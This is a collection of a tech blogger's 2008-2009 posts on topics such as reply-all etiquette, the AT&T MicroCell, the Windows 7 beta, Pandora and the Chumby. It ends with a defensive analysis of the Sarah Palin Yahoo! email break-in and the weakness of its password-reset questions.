Now, I can see where accidental reply-all's and excess email would business and technology people to look for a way to just make it stop. I'm not saying there's not a problem to be solved - quite the contrary. But reply-all also provides a legitimate and useful piece of business functionality, one that makes people more efficient and in many cases ensures all the right people are in the loop.

The real problem here is people-related: There's a time and a place for using reply-all, and when people get lazy or don't think things through, the situation can become spammy, annoying and time-consuming. When it's useful it's very useful. When its misused it's a real pain.

Given that fact, taking the all-or-nothing, binary technology approach and removing the functionality entirely seems to be a poor method for dealing with is - at it's root - a people behavior problem.

In fact, for years there have been other options available. One example is the Reply to All Monitor (pay software, try code RA26BA50 for a possible 50% price reduction). There are other apps out there, as well. If you don't want to buy software, you can also program some VBA code to modify Outlook's behavior and prompt the user before they can send ("Are you sure you want to reply-all?"). Plus, there are a variety of ways to configure all your Outlook instances to use a plugin or your own VBA code. Of course, if you're removing the reply-all button from all the Outlook instances at a company, you probably already know this.

Imagine: Someone else might have had this problem and found a smart way to solve it. I guess the thing that really bothers me is what looks and feels like a reactive decision, likely made by people without complete information. Do you really want to completely disable all reply-all's, or is the true intent and desire to try to get people to think before they send, while allowing reply-all in cases where it makes sense?

Anyhow, I think you get the point. You can't really solve people problems with technology. Instead we should use technology to try to support people in behaving in the way we need then to. But in the end, it's all about the person's behavior, not the computer's.

Or you could say, "Buttons don't reply-to-all, people reply-to-all."

Although there's not a specific release date or price available yet, AT&T has posted some information on their web site that points to the future release of their new, in-home 3G cell station, which I mentioned here a couple weeks ago.

Engadget has some details about the device from the AT&T web site (details since removed from att,com, copied below), and images (like the one above) have started to show up on AT&T's site, as well. The pictures show two manufacturer names: Cisco on the case and Scientific Atlanta on the model/serial number label.

I'm looking forward to this, as I technically live outside the usable AT&T service area and can only occasionally/barely get a wireless signal at my home.

What is an AT&T 3G MicroCell™?

AT&T 3G MicroCell acts like a mini cellular tower in your home or small business environment. It connects to AT&T's network via your existing broadband internet service (such as DSL or cable) and is designed to support up to 10 3G capable wireless phones in a home or small business setting. With AT&T 3G MicroCell, you receive improved cellular signal performance for both voice calls and cellular data applications, like picture messaging and surfing the web for up to 4 simultaneous users.

Device Features:

• Enhanced coverage indoors - supports both voice and data up to 5000 square feet.
• Available unlimited minute plans - Individual or Family Plan.
• 3G handset compatible - works with any AT&T 3G Phone.
• Up to 4 simultaneous voice or data users supported.
• Device is secure - cannot be accessed by unauthorized users, easy and secure online management of device settings
• Seamless call hand-over - start calls on your 3G MicroCell and continue uninterrupted even if you leave the building.

Device Requirements:

• 3G wireless phone/device
• Broadband service over DSL or cable
• Computer with internet access for online registration

Additional Information:

• Installing your device near a window is strongly recommended to ensure access to Global Positioning System (GPS). A GPS link is needed to verify the device location during the initial startup.
• The 3G MicroCell device is portable. The device may be moved, provided the new location is within the AT&T authorized service area and properly registered online.

Microsoft has turned loose its Windows 7 Beta release to the public, and you can download it now. The beta times-out in the fall (it is a test version, after all), and is apparently limited to 2.5 million installs (product keys). You can learn more about the Windows 7 Beta release in our interview with Microsoft's Stephen Rose on RunAs Radio.

As of 11:45 a.m. Pacific time, the "profile.microsoft.com" servers responsible for the first phase of getting the new software were - not surprisingly - too busy. Try again later. We might see things improve in a few minutes (Update: no change after the advertised time, just to many excited people), since the official release time is actually noon Pacific time (GMT -8). But it would be unusual for TechNet to post the page without the software being rolled out.

TechNet Plus subscribers (only) should download the software here.

You can use a program like ImgBurn (cool little app) to put the ISO image on your writable blank DVD.

I already have my downloaded copy and key, so time to install it on my HP laptop machine now that I have some spare time available for the next hour or so.

The CES Keynote is over, so now you can listen to our exclusive Windows 7 interview with Microsoft Sr. Community Manager for Windows Client IT Pros, Stephen Rose, available at these links:

RunAs Radio Web Site | Download MP3 file | Download WMA file

Alongside a core message of stepping up expectations in technology despite the economy, Microsoft announced this evening that it's releasing its Windows 7 Beta (build 7000) to the public for open testing and feedback. Last week Richard Campbell and I interviewed Microsoft's Stephen Rose for today's episode of RunAs Radio to discuss today's beta release, which was officially announced by Steve Ballmer during his keynote at CES tonight.

The general public gets it to download it this weekend, while MSDN and TechNet customers can get it now (product keys through the standard methods). Our interview with Stephen Rose contains some details about the how's and when's of getting the beta software for different people, as well as what one can expect from Windows 7.

It's good to see Microsoft adopting an open-beta model, where anyone who wants to can participate in the feedback process. It's going to be quite the undertaking to manage so many downloads and users, but I imagine it will be very much worth it in the end.

Of course, running a beta OS (which I tend to do regularly) isn't for the timid nor faint of heart. But for those who are comfortable, I think you'll be pleasantly surprised with the new version and what it has to offer when you check it out. Note that both 32- and 64-bit editions are available and the beta expires/times-out in the fall of this year.

Links for more information about and access to the Windows 7 Beta:

• Windows 7 page on Microsoft.com
• Windows Team Blog: Downloading Windows 7 Beta
  
• Springboard page on Microsoft TechNet

Unfortunately, I'm not one of the customers that AT&T has apparently been reaching out to in their testing of in-home micro wireless stations. I wish I was, since I live in the sticks and barely get service at all on my AT&T wireless phone. This is exactly what I need: A broadband-connected device that gives you local 3G coverage in your home.

Ars Technica reports that AT&T has described the device this way:

"AT&T's new product is a small, security-enabled cellular base station that easily connects to your home DSL or Cable Internet, providing a reliable wireless signal for any 3G phone in every room of your house. The device allows you to have unlimited, nationwide Anytime Minutes for incoming or outgoing calls."

If anyone from AT&T happens to be reading, I'd be ecstatic to try the device out and provide detailed feedback. Feel free to contact me, my email and phone number are over in the sidebar. I'm just sayin' ...

SD cards have become a de facto standard format for media in most devices, with a couple holdouts (namely Sony, which predictably uses a proprietary format). As such, the format has grown and there's been quite a bit of innovation effort focused in the SD arena.

A couple of announcements made this week at the CES show in Las Vegas are worth paying attention to. In one announcement, we learn that the SD format will support massively larger storage. In the other announcement, a popular WiFi-enabled SD card gains some nifty new video-handling features.

SDXC means on-card storage increase to a theoretical 2 terabytes

The SD Association announced a new standard (links to PDF file) that will soon have us leveraging massively larger storage capabilities (with much higher purchase prices, one would have to assume - we will have to see what the economies of scale bring us):

"The new SDXC specification provides up to 2 terabytes storage capacity and accelerates SD interface read/write speeds to 104 megabytes per second this year, with a road map to 300 megabytes per second."

That's some serious storage and speed. Photographers and HD videographers can soon rejoice. Just don't lose your little 2-terabyte card. Of course, it's likely that new devices will be needed to support the new standard. The SD Association says the SDHC, Embedded SD and SDIO specifications will also benefit from the new SD interface speeds. I'd be very (and pleasantly) surprised if we can take advantage of the larger storage capabilities in existing devices.

New Eye-Fi SD cards will allow direct HD uploads to YouTube

Eye-Fi already has a great thing going with their SD cards that use WiFi to transfer digital images, and now they're previewing a new card technology that will allow you to directly transfer your HD video content straight from the card to YouTube via WiFi. Now that's cool. I really want one of those for use in my Kodak Zi6 HD camera, and I'd use it in my full-sized HD camera, too. The power-requirement questions rattling around in my head will have to be answered at a later date, and I hope it will handle video as well as still images on the same card. Unfortunately they're not available yet, and no date was set for release. But I, for one, will definitely be watching for this.

Ever wonder how they put that amazing magical yellow line on the line of scrimmage and at the first-down point on the college and NFL football games we watch on TV? It's a terrific technology and has in many ways made watching football very different since it was adopted several years ago.

Well, for those of use who have wondered exactly how they do it, here's a video via FANDOME that explains in some technical detail how the magic TV line on the football field works:

Very cool stuff.

I've written here several times in the past about Pandora, the slick Internet music app that streams music it determines you'll like based on a starting point you give it (like a specific artist, for example). You can refine the channel by voting up or down, song by song. Based on your votes and the "genetic" makeup of the music you rate, it determines what other music to put into the channel. The greatest aspect of using Pandora is discovering some truly great music and artists, many of which I never heard of before Pandora. It changed my music world.

Not too long ago, Pandora for the iPhone was released, and it was the number-one free iPhone app for 2008, and for good reason. It works well on WiFi or 3G networks and provides the majority of the functionality you get on the full-blown web app.

Well, today Pandora released v2 of their iPhone app, and they've added even more to it. Gleaned from the release notes, here are the new features:

• Tap the album art to see a progress bar, create a station from the current song or artist, or to email the station to a friend
• View the "back side" of the album art to read artist bios
• Rotates to a landscape layout to see recently played songs (coverflow-style)
• Play samples of each of your bookmarked songs
• Create a station based on genre

It's a cool update. I just wish I could close it and have it play in the background while I do other thing son my iPhone. I mean, come on Apple - It's the number-one app, make an exception, please! Anyhow, I don't know if I will use it more (it was already pretty great), but it adds some smart new functionality that's appreciated. You can find it here (links to iTunes App Store) or just get it for free via the App Store icon on your iPhone or iPod Touch.

A few photos to show you what I'm talking about:

Artist bio

'Create New Station' options

Sending to a friend without leaving the app

Coverflow-like view of past-played songs

Mark Minasi is a true character, and always a fun guy to have a conversation with. While in Las Vegas at the Connections conference Richard Campbell and I had a couple fun discussions with Mark, including one on the concept of Cloud Computing, and in the context of Microsoft's recent Azure announcement.

Mark's take on the whole cloud-computing thing is an interesting one. You can listen to our conversation with him via the RunAs Radio show link (Site|MP3).

While you're at it, you might also be interested in our other interview discussion with Mark that we did in Vegas, in which we covered (sort of, and among many other random things) Windows 7 (Site|MP3). It's a little crazy and chaotic, but was also a lot of fun.

Enjoy.

I'm stuck at home during this incredible and unusual snow storm. I quite literally cannot drive my four-wheel-drive truck out of my driveway due to the wet and icy layer under the two feet of snow that's accumulated, melted slightly, and then refrozen over the past week. Unfortunately, when the storm is at its worse, my iPhone has lost it's connection to AT&T's network. "No service" has become its full-time status. I've tried both enabling 3G (which we don't have out here) and restricting it to EDGE only, and it simply will not connect. Until recently I would at least get a signal if I set it down it in the right spot.

When the power goes out at the house, I need to be able to make at least one phone call (to the power department). In a storm out here, power outages are a fact of life. I've been unable to call the PUD this week because I had no cell service on the iPhone. And the power went out for 7 hours the other day.

Today I got fed up with the inability to place a call and waded through the sea of snow to my truck (which is stuck), rifled through my center console, and found my old Blackberry 8800 and the battery. It's been in there and unused for over a year. I popped the SIM card out of the iPhone and slid it into the Blackberry, then popped the battery in. Even after sitting for a year the battery had a half-full charge (wow) and the Blackberry powered up and within a few second acquired the AT&T network. Text messages started to flow in - success! Of course, the data connection was refused, but the GSM phone service works fine for text and voice service. It makes Snowmageddon a little more tolerable.

I've grown more and more frustrated with my iPhone's network performance over the past month. I plan to take it in and see if it's the individual phone, or a network change, or if it's more of a design thing, but I'm not holding my breath. Luckily the iPhone still works on WiFi without the SIM card (which actually makes it an "i" rather than an "iPhone" I suppose, heh), and that's good because I rely on it for a number of truly invaluable network-capable applications.

Anyone else done comparisons, or had network performance issues with their iPhone 3G after some time has passed? I've done complete restores of the phone to make sure the phone was clean software-wise, same issues. Any experience you have will be appreciated.

There are a few different options out there for running virtual machines on your desktop. One of those available options is Parallels, and an electronic-delivery special offer lets you get two copies of Parallels v4.0 for the price of one. That's $40 per copy, quite a deal. So, if you have a need to run Windows apps on your Mac, or you want to run any other PC-based operating system, you might consider grabbing a copy. You could give the other one away as a good, geeky Christmas gift.

Link: Parallels two-for-one offer

15 years ago Rwanda was the scene of massive genocide. Today the country is working to transform itself become an Internet hub of the African continent.

This is a good video by Internet Evolution, and shows that the Internet's not just about big companies and catch-phrase ideas like Web 2.0. You can't really see or know the extent of the Internet and it's impact without going places to see the impact for yourself. Since most of us can't do that on our own, Internet Evolution's Web Wide World videos take us there.

Not that you'd actually want to do it (or at least I don't think I would), but you have to admit it's pretty cool that you can now run Linux on the iPhone. It's really basic so far, but no doubt it will get better and have more and more hardware/feature support. Maybe a dual-boot option would be cool though, after all...

Details are here and Engadget has info, too. Video showing it off below. What would you use it for?

Portland's Shizzow, a thankfully-simple service that you can use to "shout" to your people and let them know where you are, has announced they're expanding into the California market. The service got its start here in Portland, Oregon and the team has methodically built it out and run it in the home market up until now.

The basic idea of Shizzow is this: A quick and easy social networking service that lets you quickly and easily communicate to your friends about where you are so you can spend more time face-to-face. It's really as simple as that. You don't need to know addresses, you can just provide a name. Shizzow figures out the rest. You can also add custom locations (like Greg's place, for example). There's a simple interfaces for web, mobile and SMS.

Now Shizzow has sprouted wings and is offering the service to people in California, with a focus on the San Francisco Bay Area - That's quite an expansion! The service is available for people living in either area via an invitation, which you can request here. I also have ten invitations available for anyone who asks, until they're gone. Just email me or leave a comment (be sure to provide your email address in the comment form so I can send it to you).

Great job by the Shizzow crew, which (it should be noted) is a small group of people that have built and run this operation outside of the their day jobs. That's how they plan to expand - Bootstrap it along and continue along the lines of their current success. I hope we'll see an API sometime soon, since that would provide the ability to deliver mobile apps and what have you, and could open up the use (and in the end enhance usability) of the system substantially. Cool stuff!

While at the TechEd EMEA conference is Spain this week, I had the opportunity to visit with Thomas Dawkins from Microsoft's Trustworthy Computing Group. He's the guy responsible for the Microsoft Security Assessment Tool (or MSAT for short). The MSAT is a tool that's been around for a couple of years, but it was recently updated by Thomas with some great new enhancements, including a new user interface and a stronger, more complete set of back end information.

MSAT is a free tool that you can download from Microsoft. It's targeted to companies of 1,500 employees or smaller (as a general rule) and follows a questionnaire format to assess weaknesses in the IT security environment. Bt it's not a parching tool or a scanning tool. Instead, it leverages standards like ISO 27001 and NIST-800.x to baseline the security readiness of your organization.

It enables people to do what we security professionals hope for: analysis across each of the people, process and technology elements of a business' computing environment in order to ascertain how and where we need to spend our time and energy. The tool not only describes the state of readiness of the assessed environment, it also provides best-practice recommendations rooted in industry-accepted standards that can be used to improve the organization's security stance.

One of the most likely users of a tool like this is the IT manager, but one can also picture security consultants, business managers, and anyone else with responsibility for an organization's security operations leveraging the tool and the reports it generates.

You'll also likely be interested to know that Microsoft has released the fifth version of its Security Intelligence Report, which looks at the state of computer and information security over the past six months. You can find links to the full report and the key findings summary documents on Microsoft's web site.

It's been an interesting and exciting few days in iPhone land.

In the just past couple days, Google Earth and a voice recording application from Griffin have both been released for the iPhone. Add to that the news that iPhone owners now have access to AT&T WiFi hotspots for free - nice! Google Earth is - of course - free, and Griffin iTalk is free for a limited time, along with it's Mac client (for syncing).

Google earth on the iPhone (iTunes app store link) is pretty cool. It takes advantage of the GPS and accelerometer, and other than that it's, well... Google Earth, just on a smaller screen. You can use touch/twist to rotate gestures on the screen, as you'd expect. I should mention that it's crashed a lot on me, and that when I first installed it I had to hard-reset my phone to get anything to work. But for the most part its been as stable as any other complex app on the device (meaning mediocre to so-so). It's worth the install for sure, if for no other reason then just because of most of the cool things you can do with Google Earth on your Mac or PC.

The other great app that everyone with an iPhone or second-gen iPod Touch should run and get right now (while it's free) is Griffin's iTalk and the complementary iTalk Sync client, which allows you to sync your audio recordings made with the iPhone app to your Mac (PC version coming soon) over the air via WiFi. It works like a charm, is well-documented, looks great and the audio quality is user configurable. The best quality setting sounds pretty great. It could realistically be used for man-on-the-street style interviews.

Provide a file name, select the recording quality, and start recording by clicking the Big Red Button:

The green button means you're actively recording. The VU meter shows your audio levels live. Click the green button to stop recording.

You'll end up with a file (or more than one if you record multiple times) showing in the recording list.

When you load up the Mac sync client app (a small and quick install) and start the iPhone app on the same wireless network, you'll be prompted to allows the sync client to access your iPhone's recordings.

While copying the file via the sync program, the iPhone shows you the status and progress:

And finally you have the files on your Mac (or soon on a PC), in .AIFF format, ready to use. Nice and easy!

I plan to play with the app in Barcelona next week and test the audio quality to see if it's really good enough for on-the-spot interviews for the podcast. It's worth a shot, although it won't touch the quality of my Zoom H4 recorder, of course.

Update: Microsoft's Mac business unit just set the land-speed record for turning around a fix. The story is available over at TUAW.

I've been wrestling with a problem for a few days after applying the latest Office 2008 for Mac update (v12.1.3). Everything works well except for sending and responding to meeting notices.

After the update, when Entourage tries to send a meeting notice or response, it throws the following: "[Error] Unexpected data was encountered. [Explanation] Mail could not be sent. Account name: 'Exchange - Greg' Error: -17997."

Needless to say, this is a frustrating problem. I managed to send some original meeting notices by opening them up after they failed to send (you can find them in the Outbox) and clicking the 'Send' button a second time. That worked for some reason. However, the same workaround doesn't seem to work for meeting responses, so I am having to send emails created by hand in order to confirm meeting requests with people who send them to me. Thankfully, when I accept a meeting request it does make it onto my calendar properly - it's just the outbound email that gets hung up.

I've had problems in the past with Entourage not parsing updates created by Outlook, but this is a much bigger and more painful problem. This is another case of "if it just worked the way it's supposed to, it would be the best option by far." A lot like my iPhone in that regard. Glitches kill the experience and create big frustration.

UPDATE: I just found a Microsoft newsgroup thread discussing the problem, and apparently it's a known issue bug in the latest release. Hopefully they'll be able to release a fix quickly. Workarounds include:

• Uninstall Office and reinstall, then update to the version prior to the latest release
  
• Move invitations you create from the Outbox to the Drafts folder and resend (won't work for acceptance notifications, though)
  
• Grin and bear it. :)

I may try removing my Entourage account profile from this computer completely and then setting it back up with the Exchange server fresh just to see what happens. I'd lose a few things that are store local-only in the process, but that won't really hurt me should I decide to go that route.

Anyone else having this issue? Any other great workaround ideas?

The fall conference season is upon us, and I'll be off to Barcelona on the first of November for a week at the Microsoft TechEd Europe/Middle East/Asia conference. I'll be joining my friend and colleague, Richard Campbell, there for the week. If by chance you'll also be there, be sure to let me know ahead of time!

Then, the following week Richard and I will both be traveling to Las Vegas for the Connections conference, where we'll be doing a live RunAs Radio recording session. Should be fun, and we have a great guest slated. More on that later.

If you'll be at either conference, please let me know via a comment or an email!

My friend Richard Campbell and I spent the morning recording a couple episodes of RunAs Radio for publication in the near future. One of our guests (whom we shall reveal when the show is published) provided some amazingly great information about using Performance Monitor, or "perfmon" for short. He's a perfmon Ninja, really. I'm excited about that show because I think when it comes up I think people will be able to learn something quite useful, as it includes some desktop video (perfmon is, after all, a very visual tool) and other resources. I think you'll like it.

Needless to say, both of us have been playing with perfmon for the past hour. Richard just IM'ed me with a funny situation, though:

Not really sure how that works. :)

So, be sure to check out RunAs Radio for the Performance Monitor show, which will be published sometime in the next couple weeks. We've also had a number of other great guests sit down with us over the past while, talking about some very useful topics suited for IT professionals. So check it out!

Dumping the warm-fuzzy naming convention and avoiding the year-based names of the past, Microsoft announced today that the next version of Windows, which will replace Vista, will be called simply "Windows 7."

Good idea.

It's the seventh version of Windows. It makes sense. Returning to a solid, basic, fundamental naming convention helps, I think, in helping to focus purpose on ensuring the fundamental requirements are met, that a solid, simple (from a usability standpoint at least) product is released. Etherial names like "Vista" sound cool, but subconsciously they also evoke an image and set an expectation of something magical, something not quite real.

That's not what's needed, especially this next time around. So keeping the name simple is the first sign of staying focused on the core product. I like that.

As Mike Nash explains, this is the first time a code name for an early product in development has been retained for the final product. Well, given the substantial departure from the conventional Microsoft code names, I'd say it's okay this time. :)

More information is available on the Windows Vista team blog, where the announcement was made.

Analyst and research company Gartner revised its IT industry projection figures and - as reported this morning by ZDNet and released by Gartner themselves - presented them during a symposium keynote at the company's big annual IT conference, which opened this morning. In a nutshell, Gartner analyst Peter Sondergard says they still expect growth, and that even in the very worst case, IT spending next year will fall about 2.5 percent. From ZDNET:

• Gartner had expected budgets to grow 3.3 percent in 2009.
• Now the most likely case is IT budget growth of 2.3 percent to 0 percent.
• The worst case is that IT budgets will be down 2.5 percent.

Forrester Research also recently cut it's projections for 2009 IT spending, but still ended up with figures in positive growth territory. So, if the analysts are to be believed, the business sector feeding products and services to IT should still see some growth.

The question is, where will that growth happen? My guess would be that one good place to be doing business is anywhere products or services are commoditized and can be outsourced, as well as in key technology areas like security and high availability.

Having successfully managed an IT organization at a "dot-com" company through a few years of painful economic times early in this decade, I can say from experience that at the time we had to cut overall IT spending dramatically to allow the company to survive. We went quickly from buying lots of new computers and software and building out data centers to buying practically nothing new for two full years. We renegotiated stacks of contracts with vendors and major software suppliers, consolidated services, convinced vendors to charge us less, and in the end prioritized every single project and said "no" a lot.

As a result, we cut our multi-million dollar budget almost in half and - in combination with other business changes - put ourselves in a position where we were just able to weather the storm financially. It was painful and a bit scary at times, and we had to deal with the side effects of substantial change. We had to get very creative in leveraging what we already had and nothing more, but in the end we all learned a difficult yet necessary lesson: You don't have to spend, spend spend to survive, or even to thrive in some cases.

In fact, what we needed to do was just the opposite of the "spend" approach. We would still spend where it made the most sense - but our decision-making process changed dramatically. You have to shift where the money goes to maximize your dollar's impact in the specific environment, adapt to the rapid changes in the marketplace, and work with your business partners and vendors to make it through to the other side. Smart vendors and good partners know that doing whatever it takes to survive a storm together means a better relationship when we all come out of the clouds.

Gartner has a list of ten things they say IT organizations need to consider when faced with tough economic times. They are not easy or happy things. But I think they're spot-on. I've had to do all of these things when times were toughest.

• Reduce headcount or freeze hiring
• Renegotiate with technology and service providers
• Curtail data center expansion, virtualize assets and lease them back
• Consolidate systems
• Outsource commodity
• Offshore outsource
• Investment shutdown
• Prioritize projects
• Mothball businesses and projects
• Change leadership and restructure IT teams

What's your IT plan? Are your budgets shrinking, or staying about the same? How would you prepare for tight times ahead?

The Chumby is a cool little Internet-enabled device that sits pretty much wherever you want and does all sorts of cool things. You can check it out here. Today it became even better that before, in a way that I especially appreciate, so I jumped on eBay to see if any were available there (you can buy them online new, too).

So what's this new cool thing that makes it even better in my eyes? Pandora - the Internet "radio station" app that I already use on my computer as well as my iPhone, is now available for Chumby.

I'm looking forward to waking up to my Pandora stations, viewing the latest weather for flying, playing new podcasts when they become available, displaying some of my favorite pictures. I'm sure there are a ton of cool things I'll be able to use it for that I can't possibly think of yet. I'll have to take a look at the Chumby Widgets guide while I wait for it to arrive.

A bit about the Chumby:

Chumby was designed from the beginning to take all your favorite parts of the internet, whether they’re video clips, or internet radio stations, or anime cartoons, or sports scores or the weather, or anything else, and, using your existing wi-fi connection, simply deliver them to you at a glance. Automatically, one after the next. You just leave it on — don’t worry, your carbon footprint isn’t getting much deeper, chumby draws far less power than a light bulb. No need to go to your study and boot up your computer and launch a browser, no need to fish your smartphone out of your purse and launch the browser application (…and wait) to get your favorite bits of online goodness.

Do you have one? What do (or would) you use it for?

DirecTV had an unusual technical glitch sometime in the past 48 hours, and as a result customers with either standard or HD DVRs might experience issues with a "frozen remote" or similar behavior. DirecTV Has emailed customers to let them know (see below).

This is important because if your DVR is in the hung state they describe, you need to reset it, or your scheduled recordings will likely not be recorded.

I had the issue exactly as described the night before last on my HD-DVR, and did a red button reset (RBR) at that time in order to restore it to normal functionality, which is pretty much what the email from DirecTV says to do:

IMPORTANT NOTICE ABOUT YOUR HD DVR OR DVR RECEIVER

In our effort to improve and expand our service, we experienced a temporary technical glitch. If your HD DVR or DVR receiver is not responding to your remote control or front panel commands, you can resolve this issue by pressing the red "Reset" button located inside the small door on the front right corner of your receiver. Please allow about 15 minutes for your receiver to complete the resetting process. Once completed, your picture will return automatically. Unfortunately, any show you may have scheduled to record yesterday will not be available on your DVR.

We sincerely apologize for any inconvenience this may cause you. Our promise is to provide you with the best television experience, and to resolve any issues that might arise as quickly as possible. If you have any further concerns, please do not hesitate in contacting us at 1-800-347-3288.

I speak English natively. My friend that I want to chat with in IM speaks German. A chat-helper service called MTBOT (Microsoft Translation Robot) allows me to type in English, yet my friend sees and reads what I wrote translated into his native German language. Likewise, when he types in German, what I see is his messages machine-translated into English.

If you use Windows Live Messenger, you too can add mtbot@hotmail.com to your buddy list. When you want to chat with someone who speaks another language, add them to a "conversation" with your TBot. You and the other person are asked to specify your native language, and after that you just start typing.

There are a number of commands you can issue to control TBot's behavior. To see a list of commands, just type "TBOT ?" in the IM window. You'll then be presented with the list of available commands:

Cool stuff. Check out the Translator information posted over at the Live Search blog.

Currently-supported languages:

• English to/from:
• Arabic
• Chinese Simplified
• Chinese Traditional
• Dutch
• French
• German
• Italian
• Japanese
• Korean
• Portuguese
• Russian (Russian to English only)
• Spanish
• Chinese Simplified to/from Chinese Traditional

Call your Congressional rep now (202-225-3121) and ask them to support H.R. 7084, the Webcaster Settlement Act of 2008. Pandora and other similar services need your help.

I called last night and left a message for my Congressman in Oregon, David Wu. If it's your first time, calling just know it's easy: The operator will answer the phone, you ask for your congressman by name, and they transfer you to the correct office.

I left a message for Wu last night stating that I wanted him to support the resolution because it was of a timely nature and it ensured fair ad reasonable competition, and that industry lobbyist attempts to defeat it or stall it were anticompetitive in motivation.

If you use online streaming music services like Pandora or other similar ones, their very existence may depend on this resolution, so make your voice known now. It really does make a difference.

If you don't know who your Congressperson is, you can look them up quickly here. All you need is your ZIP code.

On Wednesday morning (September 24th, that is) at 9 a.m. Pacific time, Ed Bott will be joining Microsoft Technical Fellow Mark Russinovich and others for a live IT Springboard panel online discussing Windows Vista performance, a topic of interest to many and (based on my observations) understood by few.

You can ask questions live or email them to the panel ahead of time. The panel should be located here when it happens. The Springboard Virtual Roundtable Series is a great IT resource, worth keeping an eye on. Here's some detail:

Springboard Series Virtual Roundtable
Under the Hood: Windows Vista Performance…Need Answers?

Join Mark Russinovich and a panel of industry experts for a LIVE virtual roundtable to explore your top of mind performance issues, common misconfigurations, and tips on how to fix them. From boot times and applets to disk performance and battery life, find out how to optimize Windows Vista and what you can do to improve overall system performance.

Submit your performance questions live during the event or send them in advance to vrtable@microsoft.com.

Save the date!
Wednesday, September 24, 2008
9:00am Pacific Time

I wasn't going to write anything about the new Microsoft commercials, which I really like, despite the fact that I wrote about the two Seinfeld/Gates commercials.

But then I realized that the PC Guy in the commercials is Sean Siler. He's a real tech guy who actually works at Microsoft for a living - as opposed to being a professional actor. Here's his TechNet blog.

In fact, Sean epitomizes the "I'm a PC" message. We interviewed him not too long ago for RunAs Radio on the topic of IPv6 (he's the program manager for IPv6 at Microsoft). I thought you might be interested in hearing what Sean had to say at that time. He's wicked smart and a fun conversation.

It sounds like it's been an interesting evening for Sean, but he took the time to exchange a couple emails with me, which was cool of him. Congrats to Sean, and to Microsoft. Good start!

So, here you go - Our interview with Sean from a few months ago:

RunAs Radio #53: Sean Siler Sets Us Straight on IPv6! (download MP3)

And here are the three new commercials. Personally, I like 'em.

Oh and if you send an email to Sean's address as listed in the three videos, you'll get a reply. I'd post it here, but it'll be more fun if you do it yourself. :)

It's really the classic case study in information (in)security and the need for strong authentication. With all due respect to the good people at Yahoo!, this opportunity to review Internet security mechanisms is too good and too useful to pass up.

By now, we all know Republican vice-presidential candidate Sarah Palin's Yahoo! email account was broken into on Tuesday night (read the link to get the details). Apparently (and fairly obviously), access was gained via the forgotten password mechanism on the Yahoo! webmail interface, which allowed the malicious person to reset the profile's password with just a few pieces of information about the Alaska governor (birthdate, ZIP code and a piece of info related to where she met her spouse) that could be easily discovered by searching Google. That fact that so much of Palin's life history has been documented on the Web makes her that much more vulnerable to knowledge-based security mechanism hacks. It should also be noted that some security questions are better (or stronger) than others, so it's important that questions you choose for online protection are not ones that can be answered with information available on the Internet.

We security folk frequently talk about something called "multifactor authentication." By "multifactor" we mean an authentication process that requires two or more of the following:

• Something you know (passwords, user names, answers to questions)
• Something you have (token, device, phone, etc.)
• Something you are (physical fingerprint, voiceprint, or other biometric measure such as a verifiable, non-spoofable behavior (some call this "something you do"))

Most multifactor auth systems are pretty easy to recognize. You know them when you see them. Those key fobs or cards with the revolving digits that you have to provide at login are a common example. They're also fairly expensive and complicated. Some multifactor technologies are easier to use than others. There are a variety of behind-the scenes systems that track user behavior and other markers to determine if the person accessing an account is the legitimate user or a bad guy, for example. A well-designed and well-implemented system balances usability with security strength, and some systems yield higher results in that regard than others.

In this particular case, the bad guy was able to leverage only things he knew (found via a search engine) to change the password on the account and gain access to the Yahoo! Mail account. No other verification or mechanism was required. That's simply weak security in this day and age.

I walked through the account password reset system on my Yahoo! account, just so I could get a first-hand look at how it works and how simple it is to reset an account there. Honestly, it was a little too easy. Here are the details (you can click each image to see them full-size):

First of all, I selected the option on the login screen that says, "Forgot your ID or password?"

Next I was prompted either to supply an email address for reset, or to choose the option to reset without access to a registered email account (which to me was an immediate red flag). Obviously, I chose the latter.

This is where the security mechanism breaks down. I'm immediately asked to answer a "secret" security question. This process is called knowledge-based authentication. It's an additional layer of validation in a single-factor authentication scheme - I have to provide "something else I know." Even in my case it's information that could be fairly easily discovered (assuming I answered the question accurately). It should also be noted that in order to change my security question, I need to contact Yahoo! customer support (which I did).

Once I supply the correct answer to a single question, I'm immediately allowed to change my password. At this point it should be noted that if I was prompted to answer multiple questions in this validation workflow, using some randomization of questions and setting a time limit to answer each one, that would at least make it more difficult for someone to gain unauthorized access. Systems are available to do exactly that (I know, I used to manage a team that built one such authentication app).

I'm asked to verify my ZIP code and country (just for profile information), and that's it. Note that other analyses of this process seemed to say that providing the ZIP code and Country was required to reset, but that was not the case in my review. In fact, it appears the bad guy is just being handed that information after changing the password, for free. Take that info, stick it in your Google and smoke it: More search accuracy for the next phase in your attack. Not good.

I'm then notified that my account is now "up to date." I also got an email notifying me of the changes that were made to an account I had tied to the Yahoo! profile for communication purposes. At least I can rest assured that I'll get an email before the bad guy goes into my profile and removes that address from the account.

I think you're starting to get the picture. The authentication mechanism is only as strong as it's weakest part, and the fact that I have an option to reset without ever having to leave the browser window is a problem. Even changing the system to require that I receive an email (which is already the standard reset mechanism) would be better. As it stands today, that's an option, but not a requirement.

Many will argue that hey, it's just an email account, and that Yahoo! can't be expected to implement stronger security on their site as a requirement. I say that's flat out wrong (and what the account was or wasn't used for isn't particularly relevant to this analysis). Email is the number one mechanism used to move information - both innocuous and sensitive - among people. The fact that it's not the best mechanism for doing so ignores the fact that it's how people do things. There are a variety of options available to help ensure only authorized users can get access to email accounts. The fact they are not regularly implemented is a sad state of affairs.

There are many options to strengthen the identification and authentication processes. We can't discuss them all here, but a couple on my mind are described below.

Physical tokens - Making the jump from only having to remember a user name (which is usually the email address, so hardly a secret ) and a password to a scheme where one must carry a token and provide information from it in order to log in is quite a leap (carrying yet another piece of technology around doesn't exactly appeal to me), but it works. The costs associated with fulfilling, supporting and maintaining such a system are very real, and for Yahoo! may not be realistic. But there are systems available to those who know and choose to use them that can substially improve your authentication profile. Check out Omar Shahine's recent blog entry describing how he's securing his accounts in a few ways, including with an OpenID-integrated single-sign-on token system from Verisign.

But, even if you use an OpenID to sign in, what if your OpenID is a Yahoo! ID or other identity that you can reset with a single piece of discoverable knowledge? It still needs to be protected from unauthorized changes and access.

How to do that? There are several ways. I have a couple of favorites, but please feel free to share yours.

